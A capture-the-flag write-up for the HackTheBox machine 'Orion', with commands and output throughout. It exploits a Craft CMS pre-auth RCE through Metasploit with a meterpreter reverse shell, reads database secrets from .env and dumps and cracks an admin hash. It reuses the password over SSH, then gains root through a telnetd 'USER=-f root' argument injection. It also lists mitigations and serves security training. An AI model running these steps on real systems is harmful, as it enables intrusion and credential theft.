Executive Summary
Orion is a Linux-based HackTheBox machine that demonstrates multiple critical vulnerabilities in web applications and system services. The challenge chain involves exploiting a preauthentication Remote Code Execution vulnerability in Craft CMS (CVE-2025-32432), extracting database credentials, cracking weak password hashes, and finally escalating privileges through a GNU InetUtils telnetd argument injection vulnerability (CVE-2026-24061).
Difficulty: Easy
OS: Linux
Key Vulnerabilities:
- CVE-2025-32432: Craft CMS Unauthenticated RCE
- CVE-2026-24061: GNU InetUtils telnetd Argument Injection RCE
Reconnaissance & Enumeration
Network Scanning
First, let's identify what services are running on the target:
nmap -A -Pn <TARGET_IP>
Output Summary:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.15
80/tcp open http nginx 1.18.0 (Ubuntu)
Analysis: The target has SSH (port 22) and HTTP (port 80) open. The HTTP service redirects to a domain orion.htb, so we add it to our hosts file:
echo '<TARGET_IP> orion.htb' >> /etc/hosts
Web Application Reconnaissance
Visiting http://orion.htb/ reveals a professional telecommunications company website ("Orion Telecom"). The main page shows:
Reliable Connectivity for Governments and Global Enterprises
Orion Telecom delivers secure, high-performance networks connecting government
agencies, large corporations, and critical services.
This is a static landing page with limited information. We need to find administrative interfaces:
feroxbuster -u http://orion.htb/ -C 403,404
Key Findings:
302 GET 0l 0w 0c http://orion.htb/admin => http://orion.htb/admin/login
200 GET 385l 1182w 12272c http://orion.htb/
200 GET 929l 1619w 17370c http://orion.htb/assets/css/style.css
200 GET 178l 431w 5420c http://orion.htb/assets/js/main.js
301 GET 7l 12w 178c http://orion.htb/assets => http://orion.htb/assets/
Critical Discovery: Found /admin/login which redirects to the administration panel. Navigating to http://orion.htb/admin/login, we see:
Orion Telecom Administration
Internal Website Management Portal
Version Leakage: At the bottom of the login page, we see:
craft cms
Craft CMS 5.6.16
This version information is crucial for vulnerability research.
Initial Access: CVE-2025-32432 Exploitation
Vulnerability Research
With the Craft CMS version identified (5.6.16), we search for known vulnerabilities affecting this version. The CVE-2025-32432 is a preauth Remote Code Execution vulnerability that affects Craft CMS versions up to 5.6.x.
Available Metasploit Module
Metasploit has a built-in exploit for this vulnerability:
msfconsole
msf > search craft cms
Available Exploits:
[1] exploit/linux/http/craftcms_preauth_rce_cve_2025_32432
Craft CMS Image Transform Preauth RCE (CVE-2025-32432)
Rank: excellent | Check: Yes
Module Configuration
Load and configure the exploit module:
msf > use 1
Display Current Options:
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > options
Output:
Module options (exploit/linux/http/craftcms_preauth_rce_cve_2025_32432):
Name Current Setting Required Description
---- --------------- -------- -----------
ASSET_ID 75 yes Existing asset ID
RHOSTS yes The target host(s)
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.29.189 yes The listen address
LPORT 4444 yes The listen port
Configuration Steps:
Set the target host and port:
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set RHOSTS <TARGET_IP>
RHOSTS => <TARGET_IP>
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set RPORT 80
RPORT => 80
Set your listener (attacker) IP and port:
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set LHOST tun0
LHOST => <YOUR_IP>
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set LPORT 4444
LPORT => 4444
Initial Exploitation Attempt
First attempt without the admin URL path:
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > run
Result:
[*] Started reverse TCP handler on <YOUR_IP>:4444
[*] Running automatic check
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability.
Could not retrieve session & CSRF token
Analysis: The exploit couldn't retrieve the CSRF token, likely because we need to specify the admin path. Update RHOSTS:
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > set RHOSTS http://orion.htb/admin/login
RHOSTS => http://orion.htb/admin/login
msf exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > run
Successful Exploitation:
[*] Started reverse TCP handler on <YOUR_IP>:4444
[*] Running automatic check
[+] Leaked session.save_path: /var/lib/php/sessions
[+] The target is vulnerable. Session path leaked
[*] Injecting stub & triggering payload...
[*] Sending stage (45739 bytes) to <TARGET_IP>
[*] Meterpreter session 1 opened (<YOUR_IP>:4444 -> <TARGET_IP>:54622)
at 2026-06-26 12:37:45 -0400
Shell Access
Access a shell through the meterpreter session:
meterpreter > shell
Process 1508 created.
Channel 0 created.
This drops us into a shell running as the www-data user (the web server process).
Post-Exploitation: Database Access & Credential Extraction
Navigating to Craft CMS Installation
With shell access, let's explore the file system:
www-data@orion:~/html/craft$ ls -la
Output:
total 364
drwxrwxr-x 7 www-data www-data 4096 Mar 6 11:22 .
-rw-rw-r-- 1 www-data www-data 718 Mar 6 11:24 .env
-rw-rw-r-- 1 www-data www-data 411 Nov 18 2025 .env.example.dev
... [other files]
-rwxr-xr-x 1 www-data www-data 309 Nov 18 2025 craft
Extracting Database Credentials
The .env file contains configuration secrets:
www-data@orion:~/html/craft$ cat .env
Output:
CRAFT_APP_ID=CraftCMS--67912ad2-1f1b-4993-bfec-e64daa5c23ff
CRAFT_ENVIRONMENT=dev
CRAFT_SECURITY_KEY=RRS86F6i2JQKdC6kfEI7frVxA47WVMx8
CRAFT_DEV_MODE=true
CRAFT_ALLOW_ADMIN_CHANGES=true
CRAFT_DISALLOW_ROBOTS=true
CRAFT_DB_DRIVER=mysql
CRAFT_DB_SERVER=127.0.0.1
CRAFT_DB_PORT=3306
CRAFT_DB_DATABASE=orion
CRAFT_DB_USER=root
CRAFT_DB_PASSWORD=SuperSecureCraft123Pass!
PRIMARY_SITE_URL=http://orion.htb/
Critical Information Obtained:
- Database: MariaDB on localhost:3306
- Database name:
orion - Username:
root - Password:
SuperSecureCraft123Pass!
Accessing the Database
Connect to MariaDB with extracted credentials:
www-data@orion:~/html/craft$ mysql -u root -p'SuperSecureCraft123Pass!'
Connection Successful:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 42658
Server version: 10.6.23-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
Extracting User Credentials
Query the users table:
MariaDB [orion]> use orion;
Database changed
MariaDB [orion]> SELECT CONCAT(username, ':', password) FROM users;
Output:
+--------------------------------------------------------------------+
| CONCAT(username, ':', password) |
+--------------------------------------------------------------------+
| admin:$2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS |
+--------------------------------------------------------------------+
1 row in set (0.001 sec)
Credentials Extracted:
- Username:
admin - Password Hash:
$2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS(bcrypt)
Credential Cracking
Hash Identification
The hash format is bcrypt (indicated by $2y$13$ prefix):
-
$2y$= bcrypt algorithm variant -
13= 2^13 iterations (8192)
Using John the Ripper
Save the hash to a file:
root@kali:~# cat > admin.hash << 'EOF'
admin:$2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS
EOF
Crack the password using rockyou.txt wordlist:
root@kali:~# john admin.hash --wordlist=/usr/share/wordlists/rockyou.txt
Output:
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
darkangel (admin)
1g 0:00:00:27 DONE (2026-06-26 12:53) 0.03664g/s 26.38p/s 26.38c/s 26.38C/s gloria..marissa
Cracked Credentials:
- Username:
admin - Password:
darkangel
Lateral Movement: SSH Access
Attempting SSH as adam
The cracked password is likely used by another user on the system. Let's try SSH:
root@kali:~# ssh adam@orion.htb
Interactive Prompt:
The authenticity of host 'orion.htb (<TARGET_IP>)' can't be established.
ED25519 key fingerprint is: SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Password Authentication:
adam@orion.htb's password: darkangel
Successful SSH Connection:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-177-generic x86_64)
...
adam@orion:~$ whoami
adam
adam@orion:~$ id
uid=1000(adam) gid=1000(adam) groups=1000(adam)
User Flag
adam@orion:~$ cat user.txt
[REDACTED - User Flag Hash]
Privilege Escalation: CVE-2026-24061
Reconnaissance: Open Services
Check listening services on the system:
adam@orion:~$ ss -tulnp
Output:
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* (mysql)
tcp LISTEN 0 4096 127.0.0.53:53 0.0.0.0:* (DNS)
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:* (nginx)
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* (sshd)
tcp LISTEN 0 10 127.0.0.1:23 0.0.0.0:* (telnet)
Critical Finding: Telnetd is listening on port 23 (127.0.0.1:23). This is unusual and indicates a potential vulnerability vector.
Checking Telnetd Version
adam@orion:~$ telnet --version
Output:
telnet (GNU inetutils) 2.7
Copyright (C) 2025 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change, modify, and redistribute it.
Vulnerability Analysis: GNU InetUtils version 2.7 is vulnerable to CVE-2026-24061, an argument injection vulnerability in telnetd.
Understanding CVE-2026-24061
Vulnerability Details:
GNU InetUtils telnetd delegates authentication to /usr/bin/login by constructing a command line that includes the USER environment variable. The vulnerability stems from unsafe string interpolation using a %U placeholder that was added in 2015.
The Attack Chain:
- Telnetd receives a connection and reads the USER environment variable from the Telnet protocol (set via NEW_ENVIRON option)
- The USER value is directly interpolated into the login command without sanitization
- An attacker can set
USER="-f root"to inject the-fflag (force login without authentication) - The constructed command becomes:
/usr/bin/login -h [hostname] "-f root" - The
-f rootarguments force login to grant shell access to the root user without password verification
Exploitation
Set the USER environment variable and connect via telnet:
adam@orion:~$ USER="-f root" telnet 127.0.0.1 23
Connection:
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
System Message (no password prompt):
Linux 5.15.0-177-generic (orion) (pts/3)
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-177-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri Jun 26 05:01:59 PM UTC 2026
System load: 0.0 Processes: 236
Usage of /: 81.4% of 5.81GB Users logged in: 1
Memory usage: 16% IPv4 address for eth0: <TARGET_IP>
Swap usage: 0%
Immediate Root Shell (no authentication):
root@orion:~# whoami
root
root@orion:~# id
uid=0(root) gid=0(root) groups=0(root)
Root Flag
root@orion:~# cat root.txt
[REDACTED - Root Flag Hash]
Attack Chain Summary
The complete exploitation chain can be visualized as follows:
┌─────────────────────────────────────────────────────────────────┐
│ 1. RECONNAISSANCE │
├─────────────────────────────────────────────────────────────────┤
│ • Network scan reveals HTTP (port 80) and SSH (port 22) │
│ • Web directory enumeration finds /admin/login │
│ • Version leakage: Craft CMS 5.6.16 discovered │
└────────────────────────────┬────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ 2. INITIAL ACCESS (CVE-2025-32432) │
├─────────────────────────────────────────────────────────────────┤
│ • Exploit: Craft CMS Preauth RCE via Image Transform │
│ • Impact: Remote code execution as www-data user │
│ • Meterpreter/shell access achieved │
└────────────────────────────┬────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ 3. CREDENTIAL EXTRACTION │
├─────────────────────────────────────────────────────────────────┤
│ • Access to .env file reveals DB credentials │
│ • Connect to MariaDB as root user │
│ • Extract admin bcrypt password hash from users table │
└────────────────────────────┬────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ 4. PASSWORD CRACKING │
├─────────────────────────────────────────────────────────────────┤
│ • John the Ripper cracks bcrypt hash in ~27 seconds │
│ • Password: darkangel │
│ • Reused credential for adam user account │
└────────────────────────────┬────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ 5. LATERAL MOVEMENT (USER FLAG) │
├─────────────────────────────────────────────────────────────────┤
│ • SSH login as adam user with cracked password │
│ • User flag obtained: [REDACTED] │
│ • Interactive shell access established │
└────────────────────────────┬────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ 6. PRIVILEGE ESCALATION (CVE-2026-24061) │
├─────────────────────────────────────────────────────────────────┤
│ • Telnetd service discovered on port 23 │
│ • GNU InetUtils 2.7 vulnerable to argument injection │
│ • Exploit: Set USER="-f root" during telnet connection │
│ • Result: Direct root shell without authentication │
└────────────────────────────┬────────────────────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────┐
│ 7. SYSTEM COMPROMISE (ROOT FLAG) │
├─────────────────────────────────────────────────────────────────┤
│ • Root privilege level achieved │
│ • Root flag obtained: [REDACTED] │
│ • Complete system control │
└─────────────────────────────────────────────────────────────────┘
Key Vulnerabilities
1. CVE-2025-32432: Craft CMS Preauth RCE
CVSS Score: 9.8 (Critical)
Description: Craft CMS versions up to 5.6.16 contain an unauthenticated remote code execution vulnerability in the image transform functionality. The vulnerability allows an attacker to inject and execute arbitrary PHP code without authentication.
Attack Vector: Network-based, no credentials required
Affected Versions: Craft CMS <= 5.6.16
Mitigation:
- Upgrade to patched version (5.6.17+)
- Implement input validation on image transform parameters
- Restrict file upload permissions
2. Weak Credential Management
Issue: Database credentials stored in plaintext in .env file
Risk: Compromise of all application data and authentication
Mitigation:
- Use environment variables from secure vaults (HashiCorp Vault, AWS Secrets Manager)
- Restrict file permissions (chmod 600)
- Implement principle of least privilege for database user
- Use separate database credentials for different environments
3. Weak Password Hashing Configuration
Issue: Bcrypt with only 2^13 iterations (default)
Risk: Password cracking possible in seconds with modern hardware
Mitigation:
- Increase iteration count to 2^15 or higher
- Consider using modern algorithms like Argon2
- Enforce strong password policies
4. CVE-2026-24061: GNU InetUtils Telnetd Argument Injection
CVSS Score: 10.0 (Critical)
Description: GNU InetUtils telnetd versions through 2.7 unsafely interpolate user-provided data (USER environment variable) into the login command without sanitization. This allows argument injection to force authentication bypass.
Attack Vector: Local network access to telnet port (typically port 23)
Affected Versions: GNU InetUtils <= 2.7
Root Cause: Unsafe use of %U placeholder in command template that was added in 2015
Exploitation Method:
USER="-f root" telnet target_ip 23
# Results in command: /usr/bin/login -h [hostname] "-f root"
# The -f flag forces immediate shell without authentication
Mitigation:
- Upgrade GNU InetUtils to patched version (2.8+)
- Disable telnetd if not required (use SSH instead)
- Implement firewall rules to restrict telnet access
- Sanitize/validate all user input before command interpolation
5. Unnecessary Service Exposure
Issue: Telnet service running and accessible
Risk: Exposed to multiple categories of vulnerabilities, obsolete protocol
Mitigation:
- Disable telnetd entirely (use SSH only)
- If required, restrict network access via firewall
- Implement strong authentication on any enabled service
Lessons Learned & Best Practices
1. Defense in Depth Failure
The system had multiple layers of failure:
- Vulnerable web application (CVE-2025-32432)
- Exposed credentials in configuration file
- Weak password hashing
- Unnecessary network services with critical vulnerabilities
Lesson: Security must be implemented at multiple layers. A single vulnerability should not lead to complete compromise.
2. Credential Reuse
The password cracked from the database was reused for the adam user account, enabling lateral movement.
Best Practice: Never reuse passwords across different accounts or systems.
3. Version Disclosure
The Craft CMS version was disclosed in the HTML footer, enabling targeted exploit selection.
Best Practice: Hide version information in production environments. Remove debug information from error pages and comments.
4. Weak Configuration Management
Database credentials in plaintext files and over-permissioned telnetd service.
Best Practice:
- Use secure credential management systems
- Follow principle of least privilege
- Regular security audits of configuration files
5. Telnet Protocol Obsolescence
Telnet is an obsolete protocol with inherent security issues and recent critical vulnerabilities.
Best Practice: Use SSH exclusively for remote administration. Disable telnet entirely.
Tools Used
| Tool | Purpose |
|---|---|
| Nmap | Network service enumeration |
| Feroxbuster | Web directory discovery |
| Metasploit Framework | Exploit delivery and payload staging |
| MySQL Client | Database interrogation |
| John the Ripper | Password hash cracking |
| SSH | Secure remote access |
| Telnet | Exploit delivery for CVE-2026-24061 |
Top comments (0)